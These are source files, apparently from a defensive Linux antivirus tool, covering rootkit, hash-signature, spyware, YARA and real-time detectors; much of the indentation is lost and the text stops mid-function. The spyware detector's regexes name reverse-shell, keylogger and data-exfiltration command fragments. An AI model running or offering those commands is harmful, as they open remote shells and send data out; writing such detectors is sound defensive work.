proc_dir = Path("/proc")
if not proc_dir.is_dir():
return results # non-Linux
proc_pids: Set[int] = set()
try:
for entry in proc_dir.iterdir():
if entry.name.isdigit():
proc_pids.add(int(entry.name))
except PermissionError:
return results
psutil_pids = set(psutil.pids())
hidden = proc_pids - psutil_pids
for pid in hidden:
name = ""
try:
comm = proc_dir / str(pid) / "comm"
if comm.exists():
name = comm.read_text().strip()
except OSError:
pass
results.append(DetectionResult(
threat_name="Rootkit.HiddenProcess",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=85,
details=f"PID {pid} ({name or 'unknown'}) visible in /proc but hidden from psutil",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Hidden kernel modules
# ------------------------------------------------------------------
def _check_hidden_kernel_modules(self) -> List[DetectionResult]:
"""Compare ``lsmod`` output with ``/proc/modules`` to find discrepancies."""
results: List[DetectionResult] = []
proc_modules_path = Path("/proc/modules")
if not proc_modules_path.exists():
return results # non-Linux
# Modules from /proc/modules.
try:
proc_content = proc_modules_path.read_text()
except PermissionError:
return results
proc_mods: Set[str] = set()
for line in proc_content.splitlines():
parts = line.split()
if parts:
proc_mods.add(parts[0])
# Modules from lsmod.
lsmod_mods: Set[str] = set()
try:
output = subprocess.check_output(["lsmod"], stderr=subprocess.DEVNULL, timeout=10)
for line in output.decode(errors="replace").splitlines()[1:]:
parts = line.split()
if parts:
lsmod_mods.add(parts[0])
except (FileNotFoundError, subprocess.SubprocessError, OSError):
return results # lsmod not available
# Modules in /proc but NOT in lsmod → hidden from userspace.
hidden = proc_mods - lsmod_mods
for mod in hidden:
results.append(DetectionResult(
threat_name="Rootkit.HiddenKernelModule",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=80,
details=f"Kernel module '{mod}' in /proc/modules but hidden from lsmod",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Hidden network ports
# ------------------------------------------------------------------
def _check_hidden_network_ports(self) -> List[DetectionResult]:
"""Compare ``ss``/``netstat`` listening ports with psutil."""
results: List[DetectionResult] = []
# Ports from psutil.
psutil_ports: Set[int] = set()
try:
for conn in psutil.net_connections(kind="inet"):
if conn.status == "LISTEN" and conn.laddr:
psutil_ports.add(conn.laddr.port)
except psutil.AccessDenied:
return results
# Ports from ss.
ss_ports: Set[int] = set()
try:
output = subprocess.check_output(
["ss", "-tlnH"], stderr=subprocess.DEVNULL, timeout=10
)
            for line in output.decode(errors="replace").splitlines():
                # ss -tlnH columns: State Recv-Q Send-Q Local:Port Peer:Port
                parts = line.split()
                if len(parts) < 4:
                    continue
                try:
                    ss_ports.add(int(parts[3].rsplit(":", 1)[1]))
                except (ValueError, IndexError):
                    continue
except (FileNotFoundError, subprocess.SubprocessError, OSError):
return results # ss not available
# Ports in ss but not in psutil → potentially hidden by a rootkit.
hidden = ss_ports - psutil_ports
for port in hidden:
results.append(DetectionResult(
threat_name="Rootkit.HiddenPort",
threat_type="ROOTKIT",
severity="HIGH",
confidence=70,
details=f"Listening port {port} visible to ss but hidden from psutil",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Malicious environment variables
# ------------------------------------------------------------------
def _check_malicious_env_vars(self) -> List[DetectionResult]:
"""Check the current environment for known-risky variables."""
results: List[DetectionResult] = []
for entry in MALICIOUS_ENV_VARS:
if "=" in entry:
# Exact key=value match (e.g. "HISTFILE=/dev/null").
key, val = entry.split("=", 1)
if os.environ.get(key) == val:
results.append(DetectionResult(
threat_name="Rootkit.EnvVar.Suspicious",
threat_type="ROOTKIT",
severity="HIGH",
confidence=75,
details=f"Suspicious environment variable: {key}={val}",
detector_name=self.name,
))
else:
# Key presence check (e.g. "LD_PRELOAD").
if entry in os.environ:
results.append(DetectionResult(
threat_name="Rootkit.EnvVar.Suspicious",
threat_type="ROOTKIT",
severity="HIGH",
confidence=65,
details=f"Suspicious environment variable set: {entry}={os.environ[entry][:100]}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Tampered log files
# ------------------------------------------------------------------
_LOG_PATHS = [
"/var/log/auth.log",
"/var/log/syslog",
"/var/log/messages",
"/var/log/secure",
"/var/log/wtmp",
"/var/log/btmp",
"/var/log/lastlog",
]
def _check_tampered_logs(self) -> List[DetectionResult]:
"""Look for signs of log tampering: zero-byte logs, missing logs,
or logs whose mtime is suspiciously older than expected.
"""
results: List[DetectionResult] = []
for log_path_str in self._LOG_PATHS:
log_path = Path(log_path_str)
if not log_path.exists():
# Missing critical log.
if log_path_str in ("/var/log/auth.log", "/var/log/syslog", "/var/log/wtmp"):
results.append(DetectionResult(
threat_name="Rootkit.Log.Missing",
threat_type="ROOTKIT",
severity="HIGH",
confidence=60,
details=f"Critical log file missing: {log_path_str}",
detector_name=self.name,
))
continue
try:
st = log_path.stat()
except OSError:
continue
# Zero-byte log file (may have been truncated).
if st.st_size == 0:
results.append(DetectionResult(
threat_name="Rootkit.Log.Truncated",
threat_type="ROOTKIT",
severity="HIGH",
confidence=70,
details=f"Log file is empty (possibly truncated): {log_path_str}",
detector_name=self.name,
))
return results
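Every cross-view check in this file (processes, kernel modules, ports) reduces to the same set difference between a kernel-level view and a userspace-tool view; a sketch with hypothetical sample data:

```python
def cross_view_hidden(kernel_view: set[str], userspace_view: set[str]) -> list[str]:
    """Items the kernel reports but userspace tooling does not show."""
    return sorted(kernel_view - userspace_view)

# Hypothetical example: /proc/modules lists a module that lsmod omits.
proc_modules = {"ext4", "xfs", "diamorphine"}
lsmod_modules = {"ext4", "xfs"}
```

An empty difference means the two views agree; any leftover entry warrants a CRITICAL finding, since legitimate software has no reason to hide from only one of the two interfaces.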


@@ -0,0 +1,192 @@
"""AYN Antivirus — Signature-based Detector.
Looks up file hashes against the threat signature database populated by
the feed update pipeline (MalwareBazaar, ThreatFox, etc.). Uses
:class:`~ayn_antivirus.signatures.db.hash_db.HashDatabase` so that
definitions written by ``ayn-antivirus update`` are immediately available
for detection.
"""
from __future__ import annotations
import logging
from pathlib import Path
from typing import Dict, List, Optional
from ayn_antivirus.constants import DEFAULT_DB_PATH
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
from ayn_antivirus.utils.helpers import hash_file as _hash_file_util
logger = logging.getLogger("ayn_antivirus.detectors.signature")
_VALID_SEVERITIES = {"CRITICAL", "HIGH", "MEDIUM", "LOW"}
class SignatureDetector(BaseDetector):
"""Detect known malware by matching file hashes against the signature DB.
Parameters
----------
db_path:
Path to the shared SQLite database that holds the ``threats``,
``ioc_ips``, ``ioc_domains``, and ``ioc_urls`` tables.
"""
def __init__(self, db_path: str | Path = DEFAULT_DB_PATH) -> None:
self.db_path = str(db_path)
self._hash_db = None
self._ioc_db = None
self._loaded = False
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "signature_detector"
@property
def description(self) -> str:
return "Hash-based signature detection using threat intelligence feeds"
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
"""Check the file's hash against the ``threats`` table.
If *file_hash* is not supplied it is computed on the fly.
"""
self._ensure_loaded()
results: List[DetectionResult] = []
if not self._hash_db:
return results
# Compute hash if not provided.
if not file_hash:
            try:
                file_hash = _hash_file_util(str(file_path), algo="sha256")
            except Exception as exc:
                logger.debug("Cannot hash %s: %s", file_path, exc)
                return results
# Also compute MD5 for VirusShare lookups.
md5_hash = None
try:
md5_hash = _hash_file_util(str(file_path), algo="md5")
except Exception:
pass
# Look up SHA256 first, then MD5.
threat = self._hash_db.lookup(file_hash)
if not threat and md5_hash:
threat = self._hash_db.lookup(md5_hash)
if threat:
severity = (threat.get("severity") or "HIGH").upper()
if severity not in _VALID_SEVERITIES:
severity = "HIGH"
results.append(DetectionResult(
threat_name=threat.get("threat_name", "Malware.Known"),
threat_type=threat.get("threat_type", "MALWARE"),
severity=severity,
confidence=100,
details=(
f"Known threat signature match "
f"(source: {threat.get('source', 'unknown')}). "
f"Hash: {file_hash[:16]}... "
f"Details: {threat.get('details', '')}"
),
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# IOC lookup helpers (used by engine for network enrichment)
# ------------------------------------------------------------------
def lookup_hash(self, file_hash: str) -> Optional[Dict]:
"""Look up a single hash. Returns threat info dict or ``None``."""
self._ensure_loaded()
if not self._hash_db:
return None
return self._hash_db.lookup(file_hash)
def lookup_ip(self, ip: str) -> Optional[Dict]:
"""Look up an IP against the IOC database."""
self._ensure_loaded()
if not self._ioc_db:
return None
return self._ioc_db.lookup_ip(ip)
def lookup_domain(self, domain: str) -> Optional[Dict]:
"""Look up a domain against the IOC database."""
self._ensure_loaded()
if not self._ioc_db:
return None
return self._ioc_db.lookup_domain(domain)
# ------------------------------------------------------------------
# Statistics
# ------------------------------------------------------------------
def get_stats(self) -> Dict:
"""Return signature / IOC database statistics."""
self._ensure_loaded()
stats: Dict = {"hash_count": 0, "loaded": self._loaded}
if self._hash_db:
stats["hash_count"] = self._hash_db.count()
stats.update(self._hash_db.get_stats())
if self._ioc_db:
stats["ioc_ips"] = len(self._ioc_db.get_all_malicious_ips())
stats["ioc_domains"] = len(self._ioc_db.get_all_malicious_domains())
return stats
@property
def signature_count(self) -> int:
"""Number of hash signatures currently loaded."""
self._ensure_loaded()
return self._hash_db.count() if self._hash_db else 0
# ------------------------------------------------------------------
# Lifecycle
# ------------------------------------------------------------------
def close(self) -> None:
"""Close database connections."""
if self._hash_db:
self._hash_db.close()
self._hash_db = None
if self._ioc_db:
self._ioc_db.close()
self._ioc_db = None
self._loaded = False
# ------------------------------------------------------------------
# Internal
# ------------------------------------------------------------------
def _ensure_loaded(self) -> None:
"""Lazy-load the database connections on first use."""
if self._loaded:
return
if not self.db_path:
logger.warning("No signature DB path configured")
self._loaded = True
return
try:
from ayn_antivirus.signatures.db.hash_db import HashDatabase
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
self._hash_db = HashDatabase(self.db_path)
self._hash_db.initialize()
self._ioc_db = IOCDatabase(self.db_path)
self._ioc_db.initialize()
count = self._hash_db.count()
logger.info("Signature DB loaded: %d hash signatures", count)
except Exception as exc:
logger.error("Failed to load signature DB: %s", exc)
self._loaded = True
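`_hash_file_util` comes from the helpers module, which is outside this diff; a hedged sketch of what such a chunked hasher typically looks like (names here are assumptions, not the actual helper):

```python
import hashlib

def hash_file(path: str, algo: str = "sha256", chunk_size: int = 1 << 20) -> str:
    """Hash a file in fixed-size chunks so large samples never load fully into RAM."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()
```

Computing SHA-256 and MD5 as two separate passes, as `detect()` does, reads the file twice; a single pass that updates both digests would halve the I/O if scan throughput ever matters.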


@@ -0,0 +1,366 @@
"""Spyware detector for AYN Antivirus.
Scans files and system state for indicators of spyware: keyloggers, screen
capture utilities, data exfiltration patterns, reverse shells, unauthorized
SSH keys, and suspicious shell-profile modifications.
"""
from __future__ import annotations
import re
from pathlib import Path
from typing import List, Optional
from ayn_antivirus.constants import SUSPICIOUS_CRON_PATTERNS
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
# ---------------------------------------------------------------------------
# File-content patterns
# ---------------------------------------------------------------------------
# Keylogger indicators.
_RE_KEYLOGGER = re.compile(
rb"(?:"
rb"/dev/input/event\d+"
rb"|xinput\s+(?:test|list)"
rb"|xdotool\b"
rb"|showkey\b"
rb"|logkeys\b"
rb"|pynput\.keyboard"
rb"|keyboard\.on_press"
rb"|evdev\.InputDevice"
rb"|GetAsyncKeyState"
rb"|SetWindowsHookEx"
rb")",
re.IGNORECASE,
)
# Screen / audio capture.
_RE_SCREEN_CAPTURE = re.compile(
rb"(?:"
rb"scrot\b"
rb"|import\s+-window\s+root"
rb"|xwd\b"
rb"|ffmpeg\s+.*-f\s+x11grab"
rb"|xdpyinfo"
rb"|ImageGrab\.grab"
rb"|screenshot"
rb"|pyautogui\.screenshot"
rb"|screencapture\b"
rb")",
re.IGNORECASE,
)
_RE_AUDIO_CAPTURE = re.compile(
rb"(?:"
rb"arecord\b"
rb"|parecord\b"
rb"|ffmpeg\s+.*-f\s+(?:alsa|pulse|avfoundation)"
rb"|pyaudio"
rb"|sounddevice"
rb")",
re.IGNORECASE,
)
# Data exfiltration.
_RE_EXFIL = re.compile(
rb"(?:"
rb"curl\s+.*-[FdT]\s"
rb"|curl\s+.*--upload-file"
rb"|wget\s+.*--post-file"
rb"|scp\s+.*@"
rb"|rsync\s+.*@"
rb"|nc\s+-[^\s]*\s+\d+\s*<"
rb"|python[23]?\s+-m\s+http\.server"
rb")",
re.IGNORECASE,
)
# Reverse shell.
_RE_REVERSE_SHELL = re.compile(
rb"(?:"
rb"bash\s+-i\s+>&\s*/dev/tcp/"
rb"|nc\s+-e\s+/bin/"
rb"|ncat\s+.*-e\s+/bin/"
rb"|socat\s+exec:"
rb"|python[23]?\s+-c\s+['\"]import\s+socket"
rb"|perl\s+-e\s+['\"]use\s+Socket"
rb"|ruby\s+-rsocket\s+-e"
rb"|php\s+-r\s+['\"].*fsockopen"
rb"|mkfifo\s+/tmp/.*;\s*nc"
rb"|/dev/tcp/\d+\.\d+\.\d+\.\d+"
rb")",
re.IGNORECASE,
)
# Suspicious cron patterns (compiled from constants).
_RE_CRON_PATTERNS = [
re.compile(pat.encode(), re.IGNORECASE) for pat in SUSPICIOUS_CRON_PATTERNS
]
class SpywareDetector(BaseDetector):
"""Detect spyware indicators in files and on the host."""
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "spyware_detector"
@property
def description(self) -> str:
return "Detects keyloggers, screen capture, data exfiltration, and reverse shells"
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
file_path = Path(file_path)
results: List[DetectionResult] = []
try:
content = self._read_content(file_path, file_content)
except OSError as exc:
self._warn("Cannot read %s: %s", file_path, exc)
return results
# --- File-content checks ---
results.extend(self._check_keylogger(file_path, content))
results.extend(self._check_screen_capture(file_path, content))
results.extend(self._check_audio_capture(file_path, content))
results.extend(self._check_exfiltration(file_path, content))
results.extend(self._check_reverse_shell(file_path, content))
results.extend(self._check_hidden_cron(file_path, content))
# --- Host-state checks (only for relevant paths) ---
results.extend(self._check_authorized_keys(file_path, content))
results.extend(self._check_shell_profile(file_path, content))
return results
# ------------------------------------------------------------------
# Keylogger patterns
# ------------------------------------------------------------------
def _check_keylogger(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_KEYLOGGER.findall(content)
if matches:
            samples = sorted({m.decode(errors="replace") for m in matches})[:5]
results.append(DetectionResult(
threat_name="Spyware.Keylogger",
threat_type="SPYWARE",
severity="CRITICAL",
confidence=80,
details=f"Keylogger indicators: {', '.join(samples)}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Screen capture
# ------------------------------------------------------------------
def _check_screen_capture(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if _RE_SCREEN_CAPTURE.search(content):
results.append(DetectionResult(
threat_name="Spyware.ScreenCapture",
threat_type="SPYWARE",
severity="HIGH",
confidence=70,
details="Screen-capture tools or API calls detected",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Audio capture
# ------------------------------------------------------------------
def _check_audio_capture(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if _RE_AUDIO_CAPTURE.search(content):
results.append(DetectionResult(
threat_name="Spyware.AudioCapture",
threat_type="SPYWARE",
severity="HIGH",
confidence=65,
details="Audio recording tools or API calls detected",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Data exfiltration
# ------------------------------------------------------------------
def _check_exfiltration(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_EXFIL.findall(content)
if matches:
samples = [m.decode(errors="replace")[:80] for m in matches[:3]]
results.append(DetectionResult(
threat_name="Spyware.DataExfiltration",
threat_type="SPYWARE",
severity="HIGH",
confidence=70,
details=f"Data exfiltration pattern(s): {'; '.join(samples)}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Reverse shell
# ------------------------------------------------------------------
def _check_reverse_shell(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
match = _RE_REVERSE_SHELL.search(content)
if match:
results.append(DetectionResult(
threat_name="Spyware.ReverseShell",
threat_type="SPYWARE",
severity="CRITICAL",
confidence=90,
details=f"Reverse shell pattern: {match.group()[:100]!r}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Hidden cron jobs
# ------------------------------------------------------------------
def _check_hidden_cron(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
# Only check cron-related files.
path_str = str(file_path)
is_cron = any(tok in path_str for tok in ("cron", "crontab", "/var/spool/"))
if not is_cron:
return results
for pat in _RE_CRON_PATTERNS:
match = pat.search(content)
if match:
results.append(DetectionResult(
threat_name="Spyware.Cron.SuspiciousEntry",
threat_type="SPYWARE",
severity="HIGH",
confidence=80,
details=f"Suspicious cron pattern in {file_path}: {match.group()[:80]!r}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Unauthorized SSH keys
# ------------------------------------------------------------------
def _check_authorized_keys(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if file_path.name != "authorized_keys":
return results
# Flag if the file exists in an unexpected location.
path_str = str(file_path)
if not path_str.startswith("/root/") and "/.ssh/" not in path_str:
results.append(DetectionResult(
threat_name="Spyware.SSH.UnauthorizedKeysFile",
threat_type="SPYWARE",
severity="HIGH",
confidence=75,
details=f"authorized_keys found in unexpected location: {file_path}",
detector_name=self.name,
))
# Check for suspiciously many keys.
key_count = content.count(b"ssh-rsa") + content.count(b"ssh-ed25519") + content.count(b"ecdsa-sha2")
if key_count > 10:
results.append(DetectionResult(
threat_name="Spyware.SSH.ExcessiveKeys",
threat_type="SPYWARE",
severity="MEDIUM",
confidence=55,
details=f"{key_count} SSH keys in {file_path} — possible unauthorized access",
detector_name=self.name,
))
# command= prefix can force a shell command on login — often abused.
if b'command="' in content or b"command='" in content:
results.append(DetectionResult(
threat_name="Spyware.SSH.ForcedCommand",
threat_type="SPYWARE",
severity="MEDIUM",
confidence=60,
details=f"Forced command found in authorized_keys: {file_path}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Shell profile modifications
# ------------------------------------------------------------------
_PROFILE_FILES = {
".bashrc", ".bash_profile", ".profile", ".zshrc",
".bash_login", ".bash_logout",
}
_RE_PROFILE_SUSPICIOUS = re.compile(
rb"(?:"
rb"curl\s+[^\n]*\|\s*(?:sh|bash)"
rb"|wget\s+[^\n]*\|\s*(?:sh|bash)"
rb"|/dev/tcp/"
rb"|base64\s+--decode"
rb"|nohup\s+.*&"
rb"|eval\s+\$\("
rb"|python[23]?\s+-c\s+['\"]import\s+(?:socket|os|pty)"
rb")",
re.IGNORECASE,
)
def _check_shell_profile(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if file_path.name not in self._PROFILE_FILES:
return results
match = self._RE_PROFILE_SUSPICIOUS.search(content)
if match:
results.append(DetectionResult(
threat_name="Spyware.ShellProfile.SuspiciousEntry",
threat_type="SPYWARE",
severity="CRITICAL",
confidence=85,
details=(
f"Suspicious command in shell profile {file_path}: "
f"{match.group()[:100]!r}"
),
detector_name=self.name,
))
return results
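The detector above boils down to running precompiled bytes-regexes over raw file contents. A minimal, self-contained sketch of that technique (the pattern and sample input here are illustrative, not real signatures from this project):

```python
import re

# Illustrative subset of the reverse-shell alternation used above.
_RE_DEMO_REVERSE_SHELL = re.compile(
    rb"(?:bash\s+-i\s+>&\s*/dev/tcp/|nc\s+-e\s+/bin/)",
    re.IGNORECASE,
)

def scan_bytes(content: bytes) -> list[str]:
    """Return decoded matches of the demo pattern found in *content*."""
    return [m.decode(errors="replace") for m in _RE_DEMO_REVERSE_SHELL.findall(content)]

hits = scan_bytes(b"#!/bin/sh\nbash -i >& /dev/tcp/10.0.0.5/4444 0>&1\n")
# hits → ["bash -i >& /dev/tcp/"]
```

Matching on bytes (not decoded text) is deliberate: scanned files may be binaries or use unknown encodings, and `rb"..."` patterns avoid decode errors entirely.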

@@ -0,0 +1,200 @@
"""YARA-rule detector for AYN Antivirus.
Compiles and caches YARA rule files from the configured rules directory,
then matches them against scanned files. ``yara-python`` is treated as an
optional dependency — if it is missing the detector logs a warning and
returns no results.
"""
from __future__ import annotations
import logging
from pathlib import Path
from typing import Any, List, Optional
from ayn_antivirus.constants import DEFAULT_YARA_RULES_DIR
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Conditional import — yara-python is optional.
# ---------------------------------------------------------------------------
try:
import yara # type: ignore[import-untyped]
_YARA_AVAILABLE = True
except ImportError:
_YARA_AVAILABLE = False
yara = None # type: ignore[assignment]
# Severity mapping for YARA rule meta tags.
_META_SEVERITY_MAP = {
"critical": "CRITICAL",
"high": "HIGH",
"medium": "MEDIUM",
"low": "LOW",
}
class YaraDetector(BaseDetector):
"""Detect threats by matching YARA rules against file contents.
Parameters
----------
rules_dir:
Directory containing ``.yar`` / ``.yara`` rule files. Defaults to
the bundled ``signatures/yara_rules/`` directory.
"""
def __init__(self, rules_dir: str | Path = DEFAULT_YARA_RULES_DIR) -> None:
self.rules_dir = Path(rules_dir)
self._rules: Any = None # compiled yara.Rules object
self._rule_count: int = 0
self._loaded = False
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "yara_detector"
@property
def description(self) -> str:
return "Pattern matching using compiled YARA rules"
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
"""Match all loaded YARA rules against *file_path*.
Falls back to in-memory matching if *file_content* is provided.
"""
if not _YARA_AVAILABLE:
self._warn("yara-python is not installed — skipping YARA detection")
return []
if not self._loaded:
self.load_rules()
if self._rules is None:
return []
file_path = Path(file_path)
results: List[DetectionResult] = []
try:
if file_content is not None:
matches = self._rules.match(data=file_content)
else:
matches = self._rules.match(filepath=str(file_path))
except yara.Error as exc:
self._warn("YARA scan failed for %s: %s", file_path, exc)
return results
for match in matches:
meta = match.meta or {}
severity = _META_SEVERITY_MAP.get(
str(meta.get("severity", "")).lower(), "HIGH"
)
threat_type = meta.get("threat_type", "MALWARE").upper()
threat_name = meta.get("threat_name") or match.rule
matched_strings = []
try:
for offset, identifier, data in match.strings:
matched_strings.append(
f"{identifier} @ 0x{offset:x}"
)
except (TypeError, ValueError):
# match.strings format varies between yara-python versions.
pass
detail_parts = [f"YARA rule '{match.rule}' matched"]
if match.namespace and match.namespace != "default":
detail_parts.append(f"namespace={match.namespace}")
if matched_strings:
detail_parts.append(
f"strings=[{', '.join(matched_strings[:5])}]"
)
if meta.get("description"):
detail_parts.append(meta["description"])
results.append(DetectionResult(
threat_name=threat_name,
threat_type=threat_type,
severity=severity,
confidence=int(meta.get("confidence", 90)),
details=" | ".join(detail_parts),
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Rule management
# ------------------------------------------------------------------
def load_rules(self, rules_dir: Optional[str | Path] = None) -> None:
"""Compile all ``.yar`` / ``.yara`` files in *rules_dir*.
Compiled rules are cached in ``self._rules``. Call this again
after updating rule files to pick up changes.
"""
if not _YARA_AVAILABLE:
self._warn("yara-python is not installed — cannot load rules")
return
directory = Path(rules_dir) if rules_dir else self.rules_dir
if not directory.is_dir():
self._warn("YARA rules directory does not exist: %s", directory)
return
rule_files = sorted(
p for p in directory.iterdir()
if p.suffix.lower() in (".yar", ".yara") and p.is_file()
)
if not rule_files:
self._log("No YARA rule files found in %s", directory)
self._rules = None
self._rule_count = 0
self._loaded = True
return
# Build a filepaths dict for yara.compile(filepaths={...}).
        filepaths = {}
        for rf in rule_files:
            # Namespace each file by its stem; duplicate stems overwrite.
            filepaths[rf.stem] = str(rf)
try:
self._rules = yara.compile(filepaths=filepaths)
self._rule_count = len(rule_files)
self._loaded = True
self._log(
"Compiled %d YARA rule file(s) from %s",
self._rule_count,
directory,
)
except yara.SyntaxError as exc:
self._error("YARA compilation error: %s", exc)
self._rules = None
except yara.Error as exc:
self._error("YARA error: %s", exc)
self._rules = None
@property
def rule_count(self) -> int:
"""Number of rule files currently compiled."""
return self._rule_count
@property
def available(self) -> bool:
"""Return ``True`` if ``yara-python`` is installed."""
return _YARA_AVAILABLE
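`load_rules` hands `yara.compile()` a dict mapping a namespace to each rule file, keyed by the file's stem. A stdlib-only sketch of that mapping step (file names are hypothetical; the real compile call needs `yara-python` installed):

```python
from pathlib import Path

def build_filepaths(rule_files: list[Path]) -> dict[str, str]:
    """Map each rule file's stem to its path, as passed to yara.compile(filepaths=...)."""
    return {rf.stem: str(rf) for rf in rule_files}

mapping = build_filepaths([Path("rules/miners.yar"), Path("rules/rootkits.yara")])
```

Because later duplicates overwrite earlier ones, a `foo.yar` and `foo.yara` in the same directory would collide on the `foo` namespace; keeping rule-file stems unique avoids silently dropping rules.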

@@ -0,0 +1,265 @@
"""Real-time file-system monitor for AYN Antivirus.
Uses the ``watchdog`` library to observe directories for file creation,
modification, and move events, then immediately scans the affected files
through the :class:`ScanEngine`. Supports debouncing, auto-quarantine,
and thread-safe operation.
"""
from __future__ import annotations
import logging
import threading
import time
from pathlib import Path
from typing import Any, Dict, List, Optional, Set
from watchdog.events import FileSystemEvent, FileSystemEventHandler
from watchdog.observers import Observer
from ayn_antivirus.config import Config
from ayn_antivirus.core.engine import ScanEngine, FileScanResult
from ayn_antivirus.core.event_bus import EventType, event_bus
from ayn_antivirus.quarantine.vault import QuarantineVault
logger = logging.getLogger(__name__)
# File suffixes that are almost always transient / editor artefacts.
_SKIP_SUFFIXES = frozenset((
".tmp", ".swp", ".swx", ".swo", ".lock", ".part",
".crdownload", ".kate-swp", ".~lock.", ".bak~",
))
# Minimum seconds between re-scanning the same path (debounce).
_DEBOUNCE_SECONDS = 2.0
# ---------------------------------------------------------------------------
# Watchdog event handler
# ---------------------------------------------------------------------------
class _FileEventHandler(FileSystemEventHandler):
"""Internal handler that bridges watchdog events to the scan engine.
Parameters
----------
monitor:
The owning :class:`RealtimeMonitor` instance.
"""
def __init__(self, monitor: RealtimeMonitor) -> None:
super().__init__()
self._monitor = monitor
# Only react to file events (not directories).
def on_created(self, event: FileSystemEvent) -> None:
if not event.is_directory:
self._monitor._on_file_event(event.src_path, "created")
def on_modified(self, event: FileSystemEvent) -> None:
if not event.is_directory:
self._monitor._on_file_event(event.src_path, "modified")
def on_moved(self, event: FileSystemEvent) -> None:
if not event.is_directory:
dest = getattr(event, "dest_path", None)
if dest:
self._monitor._on_file_event(dest, "moved")
# ---------------------------------------------------------------------------
# RealtimeMonitor
# ---------------------------------------------------------------------------
class RealtimeMonitor:
"""Watch directories and scan new / changed files in real time.
Parameters
----------
config:
Application configuration.
scan_engine:
A pre-built :class:`ScanEngine` instance used to scan files.
"""
def __init__(self, config: Config, scan_engine: ScanEngine) -> None:
self.config = config
self.engine = scan_engine
self._observer: Optional[Observer] = None
self._lock = threading.Lock()
self._recent: Dict[str, float] = {} # path → last-scan timestamp
self._running = False
# Optional auto-quarantine vault.
self._vault: Optional[QuarantineVault] = None
if config.auto_quarantine:
self._vault = QuarantineVault(config.quarantine_path)
# ------------------------------------------------------------------
# Public API
# ------------------------------------------------------------------
def start(self, paths: Optional[List[str]] = None, recursive: bool = True) -> None:
"""Begin monitoring *paths* (defaults to ``config.scan_paths``).
Parameters
----------
paths:
Directories to watch.
recursive:
Watch subdirectories as well.
"""
watch_paths = paths or self.config.scan_paths
with self._lock:
if self._running:
logger.warning("RealtimeMonitor is already running")
return
self._observer = Observer()
handler = _FileEventHandler(self)
for p in watch_paths:
pp = Path(p)
if not pp.is_dir():
logger.warning("Skipping non-existent path: %s", p)
continue
self._observer.schedule(handler, str(pp), recursive=recursive)
logger.info("Watching: %s (recursive=%s)", pp, recursive)
self._observer.start()
self._running = True
logger.info("RealtimeMonitor started — watching %d path(s)", len(watch_paths))
event_bus.publish(EventType.SCAN_STARTED, {
"type": "realtime_monitor",
"paths": watch_paths,
})
    def stop(self) -> None:
        """Stop monitoring and wait for the observer thread to exit."""
        with self._lock:
            if not self._running or self._observer is None:
                return
            observer = self._observer
            self._observer = None
            self._running = False
        # Stop and join outside the lock: event-handler threads also take
        # self._lock (for debouncing), so joining while holding it could deadlock.
        observer.stop()
        observer.join(timeout=10)
        logger.info("RealtimeMonitor stopped")
@property
def is_running(self) -> bool:
with self._lock:
return self._running
# ------------------------------------------------------------------
# Event callbacks (called by _FileEventHandler)
# ------------------------------------------------------------------
def on_file_created(self, path: str) -> None:
"""Scan a newly created file."""
self._scan_file(path, "created")
def on_file_modified(self, path: str) -> None:
"""Scan a modified file."""
self._scan_file(path, "modified")
def on_file_moved(self, path: str) -> None:
"""Scan a file that was moved/renamed into a watched directory."""
self._scan_file(path, "moved")
# ------------------------------------------------------------------
# Internal
# ------------------------------------------------------------------
def _on_file_event(self, path: str, event_type: str) -> None:
"""Central dispatcher invoked by the watchdog handler."""
if self._should_skip(path):
return
if self._is_debounced(path):
return
logger.debug("File event: %s %s", event_type, path)
# Dispatch to the named callback (also usable directly).
if event_type == "created":
self.on_file_created(path)
elif event_type == "modified":
self.on_file_modified(path)
elif event_type == "moved":
self.on_file_moved(path)
def _scan_file(self, path: str, reason: str) -> None:
"""Run the scan engine against a single file and handle results."""
fp = Path(path)
if not fp.is_file():
return
try:
